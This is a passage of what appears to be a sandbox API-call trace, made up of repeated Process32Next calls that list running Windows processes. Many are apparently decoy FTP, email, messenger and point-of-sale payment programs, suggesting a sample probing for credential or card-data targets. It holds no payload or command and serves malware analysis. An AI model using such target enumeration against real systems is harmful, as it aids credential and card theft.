th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.958] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.959] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.961] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0297.962] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0298.076] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0298.078] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.080] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0298.082] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0298.084] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0298.086] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0298.088] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0298.093] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.095] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0298.097] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0298.100] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0298.101] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0298.104] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0298.107] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0298.109] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0298.111] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0298.113] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0298.115] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0298.117] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0298.119] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0298.220] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0298.222] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0298.224] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0298.226] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0298.229] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0298.307] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0298.309] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0298.312] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0298.314] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0298.317] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0298.319] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0298.321] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0298.327] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0298.329] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0298.331] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0298.334] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0298.336] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0298.426] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0298.429] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0298.432] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0298.435] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0298.437] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0298.440] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0298.442] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0298.445] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0298.447] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0298.453] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0298.458] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0298.461] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0298.513] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0298.515] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0298.517] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0298.519] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0298.521] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0298.523] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0298.525] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0298.530] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0298.532] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0298.534] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0298.536] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0298.538] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0298.539] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0298.541] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0298.545] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0298.547] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0298.549] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0298.551] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0298.552] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0298.554] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0298.556] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0298.613] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0298.615] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0298.617] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0298.619] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0298.626] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0298.628] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0298.631] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0298.633] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0298.636] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0298.638] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 